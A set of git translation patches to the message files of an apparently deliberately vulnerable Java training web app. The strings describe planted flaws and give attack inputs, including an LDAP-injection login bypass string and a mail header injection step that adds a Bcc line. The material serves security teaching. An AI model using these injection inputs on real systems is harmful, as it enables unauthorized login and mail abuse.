a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index a77a369..af3caba 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -259,7 +259,6 @@ msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. -msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. From deb5bafe994372aa00a5f295e986c06cfbefad63 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 22 May 2018 17:41:48 +0900 Subject: [PATCH 066/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index a77a369..af3caba 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -259,7 +259,6 @@ msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. -msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. From d41feb9b28a2fc63f624f5adc7539c09ee29b09f Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 22 May 2018 17:41:49 +0900 Subject: [PATCH 067/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index a77a369..af3caba 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -259,7 +259,6 @@ msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. -msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. From 6301ca9ec7dd21b95f29971d8d5593fa5d376356 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 12 Nov 2018 18:01:27 +0900 Subject: [PATCH 068/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index af3caba..f059658 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -1,16 +1,16 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance -description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.random.string.generator=When you enter a character count, a random characters of the count is created. description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. +description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.dangerous.file.inclusion=An external dangerous file is included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -223,7 +223,7 @@ msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending o msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. From 55b582650955269e324bde73608107d7592e4355 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 12 Nov 2018 18:01:29 +0900 Subject: [PATCH 069/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index af3caba..f059658 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -1,16 +1,16 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance -description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.random.string.generator=When you enter a character count, a random characters of the count is created. description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. +description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.dangerous.file.inclusion=An external dangerous file is included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -223,7 +223,7 @@ msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending o msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. From d487eb9aaa3315c1939218125a0c3ae3dee225fc Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 12 Nov 2018 18:01:32 +0900 Subject: [PATCH 070/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index af3caba..f059658 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -1,16 +1,16 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance -description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.random.string.generator=When you enter a character count, a random characters of the count is created. description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. +description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.dangerous.file.inclusion=An external dangerous file is included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -223,7 +223,7 @@ msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending o msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. From d7422978c3b3fd9969135bdfebbe9a4f635b3397 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 12 Nov 2018 18:01:34 +0900 Subject: [PATCH 071/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index af3caba..f059658 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -1,16 +1,16 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance -description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.random.string.generator=When you enter a character count, a random characters of the count is created. description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. +description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.dangerous.file.inclusion=An external dangerous file is included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -223,7 +223,7 @@ msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending o msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. From da7794da3297a8aed412ca247c7fcefc46ffd326 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 12 Nov 2018 18:01:36 +0900 Subject: [PATCH 072/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 25be4a9..4e0ad65 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -1,16 +1,16 @@ #X-Generator: crowdin.com description.access.history=\u3053\u306e\u30da\u30fc\u30b8\u306e\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 (\u6700\u65b0\u306e15\u4ef6) -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. -description.capitalize.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5148\u982d\u3092\u5927\u6587\u5b57\u306b\u3057\u3066\u8868\u793a\u3057\u307e\u3059\u3002\u4f8b) capitalize string -> Capitalize String +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=\u4ee5\u4e0b\u306e\u3044\u305a\u308c\u304b\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u4e0b\u3055\u3044\u3002 -description.endless.waiting=\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u305d\u306e\u6587\u5b57\u6570\u5206\u306eecho\u3092\u5b9f\u884c\u3059\u308b\u30d0\u30c3\u30c1\u3092\u4f5c\u6210\u3001\u5b9f\u884c\u3057\u307e\u3059\u3002 +description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError\u3001StackOverflowError\u3001NoClassDefFoundError\u306a\u3069 description.parse.json=JSON\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001JavaScript\u306eJSON.parse()\u3067\u691c\u8a3c\u3057\u305f\u7d50\u679c\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 description.performance.issue=\u6027\u80fd\u306b\u95a2\u3059\u308b\u554f\u984c -description.random.string.generator=\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u305d\u306e\u6587\u5b57\u6570\u5206\u306e\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210\u3057\u307e\u3059\u3002 +description.random.string.generator=When you enter a character count, a random characters of the count is created. description.response.time=\u30af\u30a8\u30ea\u6587\u5b57\u5217\u306bpingurl\=[\u4efb\u610fURL]\u3092\u8ffd\u52a0\u3059\u308b\u3068\u3001\u305d\u306eURL\u304b\u3089\u306e\u5fdc\u7b54\u30b3\u30fc\u30c9\u3068\u6642\u9593\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 -description.reverse.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u304c\u9006\u8ee2\u3057\u3066\u8868\u793a\u3055\u308c\u307e\u3059\u3002 +description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=java.lang.RuntimeException\u304b\u3089\u7d99\u627f\u3057\u305f\u4f8b\u5916 description.send.mail=\u30b5\u30a4\u30c8\u306e\u7ba1\u7406\u8005\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 description.test.regular.expression=\u6b63\u898f\u8868\u73fe^([a-z0-9]+[-]{0,1}){1,100}$\u306b\u4e00\u81f4\u3059\u308b\u6587\u5b57\u5217\u304b\u30c6\u30b9\u30c8\u3057\u3066\u4e0b\u3055\u3044\u3002 @@ -21,7 +21,7 @@ function.description.brute.force=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30f function.description.clickjacking=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306f\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.code.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.csrf=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306fCSRF\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.description.dangerous.file.inclusion=\u3053\u306e\u30da\u30fc\u30b8\u3067\u306f\u5916\u90e8\u306e\u5371\u967a\u306a\u30d5\u30a1\u30a4\u30eb\u3092\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u53ef\u80fd\u3067\u3059\u3002 +function.description.dangerous.file.inclusion=An external dangerous file is included in this page. function.description.database.connection.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 function.description.dead.lock=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af(Java)\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 function.description.dead.lock2=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af(SQL)\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 @@ -223,7 +223,7 @@ msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending o msg.note.endlesswaiting=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5b8c\u4e86\u3057\u306a\u3044\u30d7\u30ed\u30bb\u30b9\u306e\u5f85\u6a5f\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.filedescriptorleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.intoverflow=63\u4ee5\u4e0a\u306e\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). msg.note.lossoftrailingdigits=0.0000000000000001\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u60c5\u5831\u6b20\u843d\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.mailheaderinjection=\u30d6\u30e9\u30a6\u30b6\u306e\u958b\u767a\u8005\u30e2\u30fc\u30c9\u3067\u4ef6\u540d\u306einput\u30bf\u30b0\u3092textarea\u30bf\u30b0\u306b\u5909\u66f4\u3057\u3001\u300c[\u4efb\u610f\u4ef6\u540d][\u6539\u884c]Bcc\: [\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u300d\u3092\u5165\u529b\u3057\u3066\u9001\u4fe1\u3059\u308b\u3068\u3001[\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. From 8d40ede1ed0f58aea7bd63fa9a60eb624544eb81 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 12 Nov 2018 18:01:38 +0900 Subject: [PATCH 073/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index af3caba..f059658 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -1,16 +1,16 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance -description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.random.string.generator=When you enter a character count, a random characters of the count is created. description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. +description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.dangerous.file.inclusion=An external dangerous file is included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -223,7 +223,7 @@ msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending o msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. From a973a045bf1b6d5fac7c7f2bbc7243ae89024276 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 12 Nov 2018 18:01:40 +0900 Subject: [PATCH 074/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index af3caba..f059658 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -1,16 +1,16 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance -description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.random.string.generator=When you enter a character count, a random characters of the count is created. description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. +description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. 